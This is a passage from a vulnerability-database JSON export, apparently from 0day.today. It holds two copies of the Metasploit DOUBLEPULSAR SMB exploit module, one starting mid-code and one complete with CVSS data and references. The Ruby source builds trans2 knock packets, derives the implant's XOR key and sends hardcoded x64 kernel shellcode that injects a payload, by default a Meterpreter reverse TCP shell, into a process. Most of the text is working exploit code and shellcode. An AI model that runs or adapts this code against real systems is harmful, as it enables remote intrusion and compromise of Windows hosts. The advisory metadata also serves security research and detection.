end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-28] #"}, "lastseen": "2021-10-27T22:19:46", "differentElements": ["sourceData"], "edition": 58}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "0ae5dacf994a748df2f42478cbdfb064", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-28T22:18:51", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-28T22:18:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-28T22:18:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n 